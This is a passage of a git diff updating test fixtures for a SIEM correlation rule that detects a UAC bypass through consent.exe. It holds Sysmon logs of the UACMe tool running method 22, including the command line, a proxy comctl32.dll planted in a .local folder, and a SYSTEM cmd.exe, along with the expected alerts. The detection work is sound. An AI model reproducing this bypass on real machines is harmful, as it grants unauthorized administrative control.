"subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.760Z", "type": "raw", "uuid": "4358e286-1ee5-4521-af33-0ede7dac5ef4"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8183818Z\"},\"EventRecordID\":\"5438\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - UAC Bypass UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.721\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\comctl32.dll\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2019-08-03 12:08:13.721\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - UAC Bypass UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\temp\\comctl32.dll", "object.name": "comctl32.dll", "object.path": "c:\\users\\ieuser\\appdata\\local\\temp\\", "object.property": "creation time", "object.value": "2019-08-03T12:08:13.721Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\explorer.exe", "subject.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "subject.process.id": "5336", "subject.process.name": "explorer.exe", "subject.process.path": "c:\\windows\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.721Z", "type": "raw", "uuid": "114bdb77-3e56-4e56-91f1-c348231ab6e7"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.6360892Z\"},\"EventRecordID\":\"5437\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.624\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.9.1905\"},{\"Name\":\"Description\",\"text\":\"UACMe main module\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"CommandLine\",\"text\":\"UACME.exe 22\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9E57914D39FBFE785C915E225011892613C4714C,MD5=D57E778DF10F801F47119A04BE990FFD,SHA256=D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378,IMPHASH=B6789EDFE23DDA911AE37C87444D3DCB\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5a29-5d45-0000-0010deb99000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5780\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "UACME.exe 22", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.hash.imphash": "B6789EDFE23DDA911AE37C87444D3DCB", "object.process.hash.md5": "D57E778DF10F801F47119A04BE990FFD", "object.process.hash.sha1": "9E57914D39FBFE785C915E225011892613C4714C", "object.process.hash.sha256": "D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378", "object.process.id": "5336", "object.process.meta": "Description:UACMe main module | Product:UACMe | Company:Hazardous Environments", "object.process.name": "uacme.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-5a29-5d45-0000-0010deb99000", "object.process.parent.id": "5780", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\desktop\\", "object.process.version": "3.1.9.1905", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.624Z", "type": "raw", "uuid": "a82cad3b-7c34-44ff-afea-535b46c1e49e"} -# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"_rule": "UAC_Bypass_Via_Consent", "correlation_name": "UAC_Bypass_Via_Consent", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe"} \ No newline at end of file +expect 2 {"action": "start", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Bypass User Account Control", "correlation_name": "UAC_Bypass_Via_Consent", "correlation_type": "event", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "UAC_Bypass_Via_Consent|msedgewin10|consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.session_id": "999", "subject.process.cwd": "C:\\Windows\\system32\\", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "subject.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "subject.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "subject.process.name": "consent.exe", "subject.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "subject.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "subject.process.parent.id": "896", "subject.process.parent.name": "svchost.exe", "subject.process.parent.path": "c:\\windows\\system32\\", "subject.process.path": "c:\\windows\\system32\\", "subject.process.version": "10.0.17763.1 (WinBuild.160101.0800)"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_2.sc index 08063098..2550dac4 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_2.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_2.sc @@ -1,22 +1,21 @@ -# Здесь укажи какие нормализованные события ты подаёшь на вход корреляци -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:55.4089224Z\"},\"EventRecordID\":\"5455\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:55.376\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7957-5d45-0000-00100e620a01}\"},{\"Name\":\"ProcessId\",\"text\":\"3116\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BCAF0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BCAF0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7957-5d45-0000-00100e620a01", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "3116", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:55.376Z", "type": "raw", "uuid": "307840cf-68d8-4456-803b-09d028088acc" } -{ "action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5551743Z\"},\"EventRecordID\":\"5453\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.377\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"SourceProcessId\",\"text\":\"7564\"},{\"Name\":\"SourceThreadId\",\"text\":\"7188\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\consent.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"TargetProcessId\",\"text\":\"4192\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fb4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+47241|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+46196|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+48f07|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44865|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44648|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44672|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+d62ca|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+c3879|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+756c3|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+7566e\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "7188", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+47241|C:\\Windows\\System32\\KERNELBASE.dll+46196|C:\\Windows\\System32\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\Windows\\SYSTEM32\\ntdll.dll+48f07|C:\\Windows\\SYSTEM32\\ntdll.dll+44865|C:\\Windows\\SYSTEM32\\ntdll.dll+44648|C:\\Windows\\SYSTEM32\\ntdll.dll+44672|C:\\Windows\\SYSTEM32\\ntdll.dll+d62ca|C:\\Windows\\SYSTEM32\\ntdll.dll+c3879|C:\\Windows\\SYSTEM32\\ntdll.dll+756c3|C:\\Windows\\SYSTEM32\\ntdll.dll+7566e", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.id": "4192", "object.process.name": "cmd.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.377Z", "type": "raw", "uuid": "6495c614-7815-48db-b001-15f7a3b97059" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5547781Z\"},\"EventRecordID\":\"5452\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.391\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"ProcessId\",\"text\":\"4192\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4192", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.391Z", "type": "raw", "uuid": "32c28c58-c00a-498a-9029-76636a5f0bb7" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5243142Z\"},\"EventRecordID\":\"5451\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.363\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": 